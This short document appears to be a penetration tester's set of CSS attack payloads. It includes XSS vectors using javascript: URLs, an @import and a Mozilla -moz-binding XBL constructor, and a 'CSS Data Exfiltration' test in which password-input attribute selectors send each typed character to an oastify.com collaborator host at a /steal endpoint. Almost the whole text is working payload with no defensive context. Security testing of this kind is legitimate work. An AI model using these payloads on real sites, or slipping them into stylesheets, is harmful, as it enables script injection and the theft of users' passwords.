/* Test CSS file content */  
body {  
  background: url('javascript:alert("XSS")');  
  -moz-binding: url('data:text/xml,<bindings xmlns="http://www.mozilla.org/xbl"><binding id="xss"><implementation><constructor>alert("XSS")</constructor></implementation></binding></bindings>');  
}  
  
@import url('javascript:alert("XSS")');

Test 4: CSS Data Exfiltration

/* Test CSS for stealing sensitive data */  
input[type="password"][value$="a"] {  
  background: url('https://quoxqcf9kgvuyuo55j158xsbs2ytmnac.oastify.com/steal?a');  
}  
  
input[type="password"][value$="b"] {  
  background: url('https://quoxqcf9kgvuyuo55j158xsbs2ytmnac.oastify.com/steal?b');  
}  
/* Continue for all characters */
